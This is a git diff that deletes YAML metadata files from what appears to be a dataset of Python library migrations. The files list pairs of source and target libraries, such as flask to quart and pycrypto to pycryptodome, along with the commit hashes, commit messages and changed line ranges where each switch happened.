--- a/v1/data/libpair/celery,rq.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: celery,rq -source: celery -target: rq -domain: Multitasking/multiprocessing diff --git a/v1/data/libpair/cheetah,cheetah3.yaml b/v1/data/libpair/cheetah,cheetah3.yaml deleted file mode 100644 index 62533a1..0000000 --- a/v1/data/libpair/cheetah,cheetah3.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: cheetah,cheetah3 -source: cheetah -target: cheetah3 -domain: Utilities diff --git a/v1/data/libpair/dataproperty,typepy.yaml b/v1/data/libpair/dataproperty,typepy.yaml deleted file mode 100644 index 8e223cf..0000000 --- a/v1/data/libpair/dataproperty,typepy.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: dataproperty,typepy -source: dataproperty -target: typepy -domain: Utilities diff --git a/v1/data/libpair/django-registration,django-registration-redux.yaml b/v1/data/libpair/django-registration,django-registration-redux.yaml deleted file mode 100644 index 6516a96..0000000 --- a/v1/data/libpair/django-registration,django-registration-redux.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: django-registration,django-registration-redux -source: django-registration -target: django-registration-redux -domain: Development framework/extension diff --git a/v1/data/libpair/django-rest-swagger,drf-yasg.yaml b/v1/data/libpair/django-rest-swagger,drf-yasg.yaml deleted file mode 100644 index a3d30a0..0000000 --- a/v1/data/libpair/django-rest-swagger,drf-yasg.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: django-rest-swagger,drf-yasg -source: django-rest-swagger -target: drf-yasg -domain: Utilities diff --git a/v1/data/libpair/dotenv,python-dotenv.yaml b/v1/data/libpair/dotenv,python-dotenv.yaml deleted file mode 100644 index 36095d6..0000000 --- a/v1/data/libpair/dotenv,python-dotenv.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: dotenv,python-dotenv -source: dotenv -target: python-dotenv -domain: File reader/writer diff --git a/v1/data/libpair/eventlet,gevent.yaml b/v1/data/libpair/eventlet,gevent.yaml deleted file mode 100644 index 7852f8f..0000000 --- a/v1/data/libpair/eventlet,gevent.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: eventlet,gevent -source: eventlet -target: gevent -domain: Networking diff --git a/v1/data/libpair/flask,fastapi.yaml b/v1/data/libpair/flask,fastapi.yaml deleted file mode 100644 index 762d578..0000000 --- a/v1/data/libpair/flask,fastapi.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask,fastapi -source: flask -target: fastapi -domain: Development framework/extension diff --git a/v1/data/libpair/flask,quart.yaml b/v1/data/libpair/flask,quart.yaml deleted file mode 100644 index 3fe35a2..0000000 --- a/v1/data/libpair/flask,quart.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask,quart -source: flask -target: quart -domain: Development framework/extension diff --git a/v1/data/libpair/flask,uvicorn.yaml b/v1/data/libpair/flask,uvicorn.yaml deleted file mode 100644 index 6406309..0000000 --- a/v1/data/libpair/flask,uvicorn.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask,uvicorn -source: flask -target: uvicorn -domain: HTTP client/server diff --git a/v1/data/libpair/flask-restful,flask-restplus.yaml b/v1/data/libpair/flask-restful,flask-restplus.yaml deleted file mode 100644 index 079e15c..0000000 --- a/v1/data/libpair/flask-restful,flask-restplus.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask-restful,flask-restplus -source: flask-restful -target: flask-restplus -domain: Development framework/extension diff --git a/v1/data/libpair/flask-restplus,flask-restx.yaml b/v1/data/libpair/flask-restplus,flask-restx.yaml deleted file mode 100644 index 9c91938..0000000 --- a/v1/data/libpair/flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -domain: Development framework/extension diff --git a/v1/data/libpair/flask-security,flask-security-too.yaml b/v1/data/libpair/flask-security,flask-security-too.yaml deleted file mode 100644 index 2eb3ba4..0000000 --- a/v1/data/libpair/flask-security,flask-security-too.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask-security,flask-security-too -source: flask-security -target: flask-security-too -domain: Development framework/extension diff --git a/v1/data/libpair/fuzzywuzzy,rapidfuzz.yaml b/v1/data/libpair/fuzzywuzzy,rapidfuzz.yaml deleted file mode 100644 index 540ee48..0000000 --- a/v1/data/libpair/fuzzywuzzy,rapidfuzz.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: fuzzywuzzy,rapidfuzz -source: fuzzywuzzy -target: rapidfuzz -domain: Utilities diff --git a/v1/data/libpair/gcloud-aio-core,aiohttp.yaml b/v1/data/libpair/gcloud-aio-core,aiohttp.yaml deleted file mode 100644 index f476d4f..0000000 --- a/v1/data/libpair/gcloud-aio-core,aiohttp.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: gcloud-aio-core,aiohttp -source: gcloud-aio-core -target: aiohttp -domain: HTTP client/server diff --git a/v1/data/libpair/gevent,eventlet.yaml b/v1/data/libpair/gevent,eventlet.yaml deleted file mode 100644 index 418e8cd..0000000 --- a/v1/data/libpair/gevent,eventlet.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: gevent,eventlet -source: gevent -target: eventlet -domain: Networking diff --git a/v1/data/libpair/gunicorn,waitress.yaml b/v1/data/libpair/gunicorn,waitress.yaml deleted file mode 100644 index b900fc3..0000000 --- a/v1/data/libpair/gunicorn,waitress.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: gunicorn,waitress -source: gunicorn -target: waitress -domain: HTTP client/server diff --git a/v1/data/libpair/huey,celery.yaml b/v1/data/libpair/huey,celery.yaml deleted file mode 100644 index 192b239..0000000 --- a/v1/data/libpair/huey,celery.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: huey,celery -source: huey -target: celery -domain: Multitasking/multiprocessing diff --git a/v1/data/libpair/jwt,pyjwt.yaml b/v1/data/libpair/jwt,pyjwt.yaml deleted file mode 100644 index 66d94a4..0000000 --- a/v1/data/libpair/jwt,pyjwt.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: jwt,pyjwt -source: jwt -target: pyjwt -domain: Cryptography diff --git a/v1/data/libpair/kafka-python,confluent-kafka.yaml b/v1/data/libpair/kafka-python,confluent-kafka.yaml deleted file mode 100644 index e75632a..0000000 --- a/v1/data/libpair/kafka-python,confluent-kafka.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: kafka-python,confluent-kafka -source: kafka-python -target: confluent-kafka -domain: API wrapper diff --git a/v1/data/libpair/keras,torch.yaml b/v1/data/libpair/keras,torch.yaml deleted file mode 100644 index 10afd41..0000000 --- a/v1/data/libpair/keras,torch.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: keras,torch -source: keras -target: torch -domain: Machine learning diff --git a/v1/data/libpair/lockfile,fasteners.yaml b/v1/data/libpair/lockfile,fasteners.yaml deleted file mode 100644 index cabe3a7..0000000 --- a/v1/data/libpair/lockfile,fasteners.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: lockfile,fasteners -source: lockfile -target: fasteners -domain: Multitasking/multiprocessing diff --git a/v1/data/libpair/logbook,loguru.yaml b/v1/data/libpair/logbook,loguru.yaml deleted file mode 100644 index 7d29268..0000000 --- a/v1/data/libpair/logbook,loguru.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: logbook,loguru -source: logbook -target: loguru -domain: Logging/tracing diff --git a/v1/data/libpair/magic,python-magic.yaml b/v1/data/libpair/magic,python-magic.yaml deleted file mode 100644 index b7d9be1..0000000 --- a/v1/data/libpair/magic,python-magic.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: magic,python-magic -source: magic -target: python-magic -domain: Utilities diff --git a/v1/data/libpair/mysql-python,mysqlclient.yaml b/v1/data/libpair/mysql-python,mysqlclient.yaml deleted file mode 100644 index a6838b7..0000000 --- a/v1/data/libpair/mysql-python,mysqlclient.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: mysql-python,mysqlclient -source: mysql-python -target: mysqlclient -domain: Database client diff --git a/v1/data/libpair/mysql-python,pymysql.yaml b/v1/data/libpair/mysql-python,pymysql.yaml deleted file mode 100644 index b875183..0000000 --- a/v1/data/libpair/mysql-python,pymysql.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: mysql-python,pymysql -source: mysql-python -target: pymysql -domain: Database client diff --git a/v1/data/libpair/mysqlclient,psycopg2.yaml b/v1/data/libpair/mysqlclient,psycopg2.yaml deleted file mode 100644 index 9fcc574..0000000 --- a/v1/data/libpair/mysqlclient,psycopg2.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: mysqlclient,psycopg2 -source: mysqlclient -target: psycopg2 -domain: Database client diff --git a/v1/data/libpair/openpyxl,xlsxwriter.yaml b/v1/data/libpair/openpyxl,xlsxwriter.yaml deleted file mode 100644 index 35a3812..0000000 --- a/v1/data/libpair/openpyxl,xlsxwriter.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: openpyxl,xlsxwriter -source: openpyxl -target: xlsxwriter -domain: File reader/writer diff --git a/v1/data/libpair/pandas,numpy.yaml b/v1/data/libpair/pandas,numpy.yaml deleted file mode 100644 index 579183e..0000000 --- a/v1/data/libpair/pandas,numpy.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pandas,numpy -source: pandas -target: numpy -domain: Data processing diff --git a/v1/data/libpair/pil,pillow.yaml b/v1/data/libpair/pil,pillow.yaml deleted file mode 100644 index 5e6e894..0000000 --- a/v1/data/libpair/pil,pillow.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pil,pillow -source: pil -target: pillow -domain: Image processing diff --git a/v1/data/libpair/pillow,torchvision.yaml b/v1/data/libpair/pillow,torchvision.yaml deleted file mode 100644 index 4917789..0000000 --- a/v1/data/libpair/pillow,torchvision.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pillow,torchvision -source: pillow -target: torchvision -domain: Image processing diff --git a/v1/data/libpair/py-bcrypt,bcrypt.yaml b/v1/data/libpair/py-bcrypt,bcrypt.yaml deleted file mode 100644 index 4fdc5e5..0000000 --- a/v1/data/libpair/py-bcrypt,bcrypt.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: py-bcrypt,bcrypt -source: py-bcrypt -target: bcrypt -domain: Cryptography diff --git a/v1/data/libpair/pycrypto,cryptography.yaml b/v1/data/libpair/pycrypto,cryptography.yaml deleted file mode 100644 index 0659c58..0000000 --- a/v1/data/libpair/pycrypto,cryptography.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pycrypto,cryptography -source: pycrypto -target: cryptography -domain: Cryptography diff --git a/v1/data/libpair/pycrypto,pycryptodome.yaml b/v1/data/libpair/pycrypto,pycryptodome.yaml deleted file mode 100644 index d870ef9..0000000 --- a/v1/data/libpair/pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -domain: Cryptography diff --git a/v1/data/libpair/pycryptodome,pycryptodomex.yaml b/v1/data/libpair/pycryptodome,pycryptodomex.yaml deleted file mode 100644 index c34ef6e..0000000 --- a/v1/data/libpair/pycryptodome,pycryptodomex.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pycryptodome,pycryptodomex -source: pycryptodome -target: pycryptodomex -domain: Cryptography diff --git a/v1/data/libpair/pymilvus-orm,pymilvus.yaml b/v1/data/libpair/pymilvus-orm,pymilvus.yaml deleted file mode 100644 index 3bb5efd..0000000 --- a/v1/data/libpair/pymilvus-orm,pymilvus.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pymilvus-orm,pymilvus -source: pymilvus-orm -target: pymilvus -domain: Database client diff --git a/v1/data/libpair/pyqt5,pyside6.yaml b/v1/data/libpair/pyqt5,pyside6.yaml deleted file mode 100644 index 33d2c64..0000000 --- a/v1/data/libpair/pyqt5,pyside6.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pyqt5,pyside6 -source: pyqt5 -target: pyside6 -domain: Development framework/extension diff --git a/v1/data/libpair/python-ldap,ldap3.yaml b/v1/data/libpair/python-ldap,ldap3.yaml deleted file mode 100644 index f745b33..0000000 --- a/v1/data/libpair/python-ldap,ldap3.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: python-ldap,ldap3 -source: python-ldap -target: ldap3 -domain: Utilities diff --git a/v1/data/libpair/python-social-auth,social-auth-app-django.yaml b/v1/data/libpair/python-social-auth,social-auth-app-django.yaml deleted file mode 100644 index c688824..0000000 --- a/v1/data/libpair/python-social-auth,social-auth-app-django.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: python-social-auth,social-auth-app-django -source: python-social-auth -target: social-auth-app-django -domain: Development framework/extension diff --git a/v1/data/libpair/pytz,pendulum.yaml b/v1/data/libpair/pytz,pendulum.yaml deleted file mode 100644 index ee7844e..0000000 --- a/v1/data/libpair/pytz,pendulum.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pytz,pendulum -source: pytz -target: pendulum -domain: Utilities diff --git a/v1/data/libpair/pyyaml,ruamel.yaml.yaml b/v1/data/libpair/pyyaml,ruamel.yaml.yaml deleted file mode 100644 index 2d9fb92..0000000 --- a/v1/data/libpair/pyyaml,ruamel.yaml.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pyyaml,ruamel.yaml -source: pyyaml -target: ruamel.yaml -domain: File reader/writer diff --git a/v1/data/libpair/raven,sentry-sdk.yaml b/v1/data/libpair/raven,sentry-sdk.yaml deleted file mode 100644 index f0c4609..0000000 --- a/v1/data/libpair/raven,sentry-sdk.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: raven,sentry-sdk -source: raven -target: sentry-sdk -domain: Logging/tracing diff --git a/v1/data/libpair/requests,aiohttp.yaml b/v1/data/libpair/requests,aiohttp.yaml deleted file mode 100644 index f76988b..0000000 --- a/v1/data/libpair/requests,aiohttp.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: requests,aiohttp -source: requests -target: aiohttp -domain: HTTP client/server diff --git a/v1/data/libpair/retrying,tenacity.yaml b/v1/data/libpair/retrying,tenacity.yaml deleted file mode 100644 index e6c8ec5..0000000 --- a/v1/data/libpair/retrying,tenacity.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: retrying,tenacity -source: retrying -target: tenacity -domain: Utilities diff --git a/v1/data/libpair/ruamel.yaml,pyyaml.yaml b/v1/data/libpair/ruamel.yaml,pyyaml.yaml deleted file mode 100644 index b9a70e0..0000000 --- a/v1/data/libpair/ruamel.yaml,pyyaml.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: ruamel.yaml,pyyaml -source: ruamel.yaml -target: pyyaml -domain: File reader/writer diff --git a/v1/data/libpair/s3cmd,awscli.yaml b/v1/data/libpair/s3cmd,awscli.yaml deleted file mode 100644 index b1a47ca..0000000 --- a/v1/data/libpair/s3cmd,awscli.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: s3cmd,awscli -source: s3cmd -target: awscli -domain: API wrapper diff --git a/v1/data/libpair/scapy-python3,scapy.yaml b/v1/data/libpair/scapy-python3,scapy.yaml deleted file mode 100644 index 606bfd3..0000000 --- a/v1/data/libpair/scapy-python3,scapy.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: scapy-python3,scapy -source: scapy-python3 -target: scapy -domain: Networking diff --git a/v1/data/libpair/sklearn,torch.yaml b/v1/data/libpair/sklearn,torch.yaml deleted file mode 100644 index 5500d4f..0000000 --- a/v1/data/libpair/sklearn,torch.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: sklearn,torch -source: sklearn -target: torch -domain: Machine learning diff --git a/v1/data/libpair/slackclient,slack-sdk.yaml b/v1/data/libpair/slackclient,slack-sdk.yaml deleted file mode 100644 index 72921c4..0000000 --- a/v1/data/libpair/slackclient,slack-sdk.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: slackclient,slack-sdk -source: slackclient -target: slack-sdk -domain: API wrapper diff --git a/v1/data/libpair/slugify,python-slugify.yaml b/v1/data/libpair/slugify,python-slugify.yaml deleted file mode 100644 index 264dc96..0000000 --- a/v1/data/libpair/slugify,python-slugify.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: slugify,python-slugify -source: slugify -target: python-slugify -domain: Utilities diff --git a/v1/data/libpair/tensorboard,tensorboardx.yaml b/v1/data/libpair/tensorboard,tensorboardx.yaml deleted file mode 100644 index eb9449f..0000000 --- a/v1/data/libpair/tensorboard,tensorboardx.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: tensorboard,tensorboardx -source: tensorboard -target: tensorboardx -domain: Machine learning diff --git a/v1/data/libpair/urllib,urllib3.yaml b/v1/data/libpair/urllib,urllib3.yaml deleted file mode 100644 index 54c0547..0000000 --- a/v1/data/libpair/urllib,urllib3.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: urllib,urllib3 -source: urllib -target: urllib3 -domain: HTTP client/server diff --git a/v1/data/libpair/uwsgi,gunicorn.yaml b/v1/data/libpair/uwsgi,gunicorn.yaml deleted file mode 100644 index 078e15f..0000000 --- a/v1/data/libpair/uwsgi,gunicorn.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: uwsgi,gunicorn -source: uwsgi -target: gunicorn -domain: HTTP client/server diff --git a/v1/data/libpair/websocket-client,tornado.yaml b/v1/data/libpair/websocket-client,tornado.yaml deleted file mode 100644 index 36268ee..0000000 --- a/v1/data/libpair/websocket-client,tornado.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: websocket-client,tornado -source: websocket-client -target: tornado -domain: Networking diff --git a/v1/data/libpair/xlrd,openpyxl.yaml b/v1/data/libpair/xlrd,openpyxl.yaml deleted file mode 100644 index 389024a..0000000 --- a/v1/data/libpair/xlrd,openpyxl.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: xlrd,openpyxl -source: xlrd -target: openpyxl -domain: File reader/writer diff --git a/v1/data/libpair/xlsxwriter,openpyxl.yaml b/v1/data/libpair/xlsxwriter,openpyxl.yaml deleted file mode 100644 index 4679951..0000000 --- a/v1/data/libpair/xlsxwriter,openpyxl.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: xlsxwriter,openpyxl -source: xlsxwriter -target: openpyxl -domain: File reader/writer diff --git a/v1/data/migration/002f5bd_flask,quart.yaml b/v1/data/migration/002f5bd_flask,quart.yaml deleted file mode 100644 index 193e163..0000000 --- a/v1/data/migration/002f5bd_flask,quart.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: 002f5bd_flask,quart -source: flask -target: quart -repo: elblogbruno/notionai-mymind -commit: 002f5bde5d5d5f2eaaf6999e41e4619817c10400 -pair_id: flask,quart -commit_message: 'feat: Faster and more reliable thanks to switching to an async based - server with Quart and more.' -commit_url: https://github.com/elblogbruno/notionai-mymind/commit/002f5bde -code_changes: -- filepath: Python Server/app/server.py - lines: - - 149:110 - - 154:115 - - '20:14' - - 4-6:3 - - 80:55-57 diff --git a/v1/data/migration/0171fb9_pil,pillow.yaml b/v1/data/migration/0171fb9_pil,pillow.yaml deleted file mode 100644 index 90de713..0000000 --- a/v1/data/migration/0171fb9_pil,pillow.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: 0171fb9_pil,pillow -source: pil -target: pillow -repo: shoebot/shoebot -commit: 0171fb9ff6ed2fed71dcfe82eef7ca723d609fcf -pair_id: pil,pillow -commit_message: 'Reorganise requirements - - - Optional / difficult packages at the end. - - - Use Pillow instead of PIL - change Img to work with this.' -commit_url: https://github.com/shoebot/shoebot/commit/0171fb9f -code_changes: -- filepath: shoebot/data/img.py - lines: - - '9:9' diff --git a/v1/data/migration/02b064b_pycryptodome,pycryptodomex.yaml b/v1/data/migration/02b064b_pycryptodome,pycryptodomex.yaml deleted file mode 100644 index cc86cd7..0000000 --- a/v1/data/migration/02b064b_pycryptodome,pycryptodomex.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 02b064b_pycryptodome,pycryptodomex -source: pycryptodome -target: pycryptodomex -repo: snemes/malware-analysis -commit: 02b064b4acc0ae26d6c61246ab3f1f45b750091a -pair_id: pycryptodome,pycryptodomex -commit_message: Minor tweaks, switched to pycryptodomex instead of pycryptodome to - avoid collision with PyCrypto -commit_url: https://github.com/snemes/malware-analysis/commit/02b064b4 -code_changes: -- filepath: trickbot/trickbot_artifact_decrypter.py - lines: - - 11-14:11-14 diff --git a/v1/data/migration/03a9621_s3cmd,awscli.yaml b/v1/data/migration/03a9621_s3cmd,awscli.yaml deleted file mode 100644 index d0d254f..0000000 --- a/v1/data/migration/03a9621_s3cmd,awscli.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 03a9621_s3cmd,awscli -source: s3cmd -target: awscli -repo: drivendata/cookiecutter-data-science -commit: 03a96219ea30b658a005b9f1645773855313ae09 -pair_id: s3cmd,awscli -commit_message: 'Update to awscli so Python 3 works - - - Closes #23' -commit_url: https://github.com/drivendata/cookiecutter-data-science/commit/03a96219 -code_changes: [] diff --git a/v1/data/migration/0411d6a_raven,sentry-sdk.yaml b/v1/data/migration/0411d6a_raven,sentry-sdk.yaml deleted file mode 100644 index 8b1eeae..0000000 --- a/v1/data/migration/0411d6a_raven,sentry-sdk.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: 0411d6a_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: comses/comses.net -commit: 0411d6a105672268bf2519d14616da21d24a7762 -pair_id: raven,sentry-sdk -commit_message: 'upgrade to new sentry sdk: - - - django: https://docs.sentry.io/platforms/python/django/ - - - javascript: https://docs.sentry.io/platforms/javascript/ - - - TODO: add Vue integration (@cpritcha want to take the lead on this?) - - https://docs.sentry.io/platforms/javascript/vue/' -commit_url: https://github.com/comses/comses.net/commit/0411d6a1 -code_changes: [] diff --git a/v1/data/migration/047263b_flask-restful,flask-restplus.yaml b/v1/data/migration/047263b_flask-restful,flask-restplus.yaml deleted file mode 100644 index 5973287..0000000 --- a/v1/data/migration/047263b_flask-restful,flask-restplus.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 047263b_flask-restful,flask-restplus -source: flask-restful -target: flask-restplus -repo: kizniche/mycodo -commit: 047263beb9e4301c30eef0f44d8d93c722b31f20 -pair_id: flask-restful,flask-restplus -commit_message: Move from Flask_Restful to Flask_RestPlus (#705) -commit_url: https://github.com/kizniche/mycodo/commit/047263be -code_changes: -- filepath: mycodo/mycodo_flask/api.py - lines: - - '5:7' diff --git a/v1/data/migration/04a5913_pil,pillow.yaml b/v1/data/migration/04a5913_pil,pillow.yaml deleted file mode 100644 index f451ac8..0000000 --- a/v1/data/migration/04a5913_pil,pillow.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: 04a5913_pil,pillow -source: pil -target: pillow -repo: pculture/mirocommunity -commit: 04a5913ad380cb7ec7bebdc490d672107f3ee82d -pair_id: pil,pillow -commit_message: 'fix PIL build issues - - - PIL doesn''t build correctly on recent versions of Debian; it can''t find the - - ZLIB include files. Pillow is a forked version which does build correctly.' -commit_url: https://github.com/pculture/mirocommunity/commit/04a5913a -code_changes: [] diff --git a/v1/data/migration/054d5d2_fuzzywuzzy,rapidfuzz.yaml b/v1/data/migration/054d5d2_fuzzywuzzy,rapidfuzz.yaml deleted file mode 100644 index 28ef923..0000000 --- a/v1/data/migration/054d5d2_fuzzywuzzy,rapidfuzz.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: 054d5d2_fuzzywuzzy,rapidfuzz -source: fuzzywuzzy -target: rapidfuzz -repo: nlpia/nlpia-bot -commit: 054d5d207cba12d9b5c4765454be1c51424ea4f3 -pair_id: fuzzywuzzy,rapidfuzz -commit_message: 'use rapidfuzz instead of fuzzywuzzy - - - - Former-commit-id: e7d4fd555779cd407fa5e09e1944b2ba56c5db12 [formerly 53c3bce9c5f9bcec87475759fe040289d45ba1d6] - - Former-commit-id: 1503611c7150cb42575d5b94b507ba7748d21697' -commit_url: https://github.com/nlpia/nlpia-bot/commit/054d5d20 -code_changes: -- filepath: qary/skills/search_fuzzy_bots.py - lines: - - '8:8' diff --git a/v1/data/migration/08e7ffa_gunicorn,waitress.yaml b/v1/data/migration/08e7ffa_gunicorn,waitress.yaml deleted file mode 100644 index 7959236..0000000 --- a/v1/data/migration/08e7ffa_gunicorn,waitress.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 08e7ffa_gunicorn,waitress -source: gunicorn -target: waitress -repo: pbacterio/cookiecutter-django-paas -commit: 08e7ffa9b64b25a2b539b5b9ccf757c9b11a370c -pair_id: gunicorn,waitress -commit_message: Replaces gunicorn for waitress. http://blog.etianen.com/blog/2014/01/19/gunicorn-heroku-django/ -commit_url: https://github.com/pbacterio/cookiecutter-django-paas/commit/08e7ffa9 -code_changes: [] diff --git a/v1/data/migration/0911992_pycrypto,pycryptodome.yaml b/v1/data/migration/0911992_pycrypto,pycryptodome.yaml deleted file mode 100644 index e4653be..0000000 --- a/v1/data/migration/0911992_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,10 +0,0 @@ -id: 0911992_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: confluentinc/ducktape -commit: 0911992301d30bb315df4e9bab3b83254c3036fa -pair_id: pycrypto,pycryptodome -commit_message: 'ST-1307: Switch from pycrypto to pycryptodome and update to a modern - version' -commit_url: https://github.com/confluentinc/ducktape/commit/09119923 -code_changes: [] diff --git a/v1/data/migration/0a65bcc_raven,sentry-sdk.yaml b/v1/data/migration/0a65bcc_raven,sentry-sdk.yaml deleted file mode 100644 index f01ec1f..0000000 --- a/v1/data/migration/0a65bcc_raven,sentry-sdk.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 0a65bcc_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: habitissimo/myaas -commit: 0a65bcc2ce97a2e3ad9b028b1cf9bcc58499f5d9 -pair_id: raven,sentry-sdk -commit_message: update sentry client -commit_url: https://github.com/habitissimo/myaas/commit/0a65bcc2 -code_changes: -- filepath: src/runserver.py - lines: - - 7-8:6-12 diff --git a/v1/data/migration/0a70f2b_flask,quart.yaml b/v1/data/migration/0a70f2b_flask,quart.yaml deleted file mode 100644 index 4747dca..0000000 --- a/v1/data/migration/0a70f2b_flask,quart.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: 0a70f2b_flask,quart -source: flask -target: quart -repo: pgjones/faster_than_flask_article -commit: 0a70f2bddae90da13da5bce2b77ea56355ecc5d1 -pair_id: flask,quart -commit_message: Quart version -commit_url: https://github.com/pgjones/faster_than_flask_article/commit/0a70f2bd -code_changes: -- filepath: app/films.py - lines: - - '1:1' -- filepath: app/run.py - lines: - - '4:5' - - '35:12' -- filepath: app/reviews.py - lines: - - '1:1' - - '8:8' diff --git a/v1/data/migration/0d78d19_lockfile,fasteners.yaml b/v1/data/migration/0d78d19_lockfile,fasteners.yaml deleted file mode 100644 index e986f41..0000000 --- a/v1/data/migration/0d78d19_lockfile,fasteners.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: 0d78d19_lockfile,fasteners -source: lockfile -target: fasteners -repo: pantsbuild/pants -commit: 0d78d19ff4a8a44228eb59fac209e0e71e2d9152 -pair_id: lockfile,fasteners -commit_message: 'Add OwnerPrintingInterProcessFileLock and replace OwnerPrintingPIDLockFile. - - - * Remove lockfile dependency and use fasteners instead. - - * Use a file lock instead of writing out a pid to the lock file. - - * Use a separate message file to prevent stomping on the file lock. - - - Testing Done: - - CI is green: https://travis-ci.org/pantsbuild/pants/builds/119942027 - - - Bugs closed: 3124 - - - Reviewed at https://rbcommons.com/s/twitter/r/3633/' -commit_url: https://github.com/pantsbuild/pants/commit/0d78d19f -code_changes: [] diff --git a/v1/data/migration/0df86b5_logbook,loguru.yaml b/v1/data/migration/0df86b5_logbook,loguru.yaml deleted file mode 100644 index 0d55b0f..0000000 --- a/v1/data/migration/0df86b5_logbook,loguru.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 0df86b5_logbook,loguru -source: logbook -target: loguru -repo: thombashi/pingparsing -commit: 0df86b5934719de7ab7eab71f1a5006996bc5337 -pair_id: logbook,loguru -commit_message: Replace the logging library -commit_url: https://github.com/thombashi/pingparsing/commit/0df86b59 -code_changes: [] diff --git a/v1/data/migration/12e3e80_ruamel.yaml,pyyaml.yaml b/v1/data/migration/12e3e80_ruamel.yaml,pyyaml.yaml deleted file mode 100644 index 48e9582..0000000 --- a/v1/data/migration/12e3e80_ruamel.yaml,pyyaml.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: 12e3e80_ruamel.yaml,pyyaml -source: ruamel.yaml -target: pyyaml -repo: cloud-custodian/cloud-custodian -commit: 12e3e8084ddb2e7f5ccbc5ea3c3bd3e4c7e9c207 -pair_id: ruamel.yaml,pyyaml -commit_message: tools/c7n_mailer - switch ruamel dependency to pyyaml (#5521) -commit_url: https://github.com/cloud-custodian/cloud-custodian/commit/12e3e808 -code_changes: -- filepath: tools/c7n_mailer/c7n_mailer/replay.py - lines: - - '25:18' -- filepath: tools/c7n_mailer/c7n_mailer/utils.py - lines: - - '28:22' -- filepath: tools/c7n_mailer/c7n_mailer/cli.py - lines: - - '15:10' diff --git a/v1/data/migration/14388c3_pycrypto,pycryptodome.yaml b/v1/data/migration/14388c3_pycrypto,pycryptodome.yaml deleted file mode 100644 index bd020ad..0000000 --- a/v1/data/migration/14388c3_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: 14388c3_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: camptocamp/c2cgeoportal -commit: 14388c3d85ab164d7b36b1331534913a1c9d6c9a -pair_id: pycrypto,pycryptodome -commit_message: Use pycryptodome instance of the unmaintained pycrypto -commit_url: https://github.com/camptocamp/c2cgeoportal/commit/14388c3d -code_changes: -- filepath: 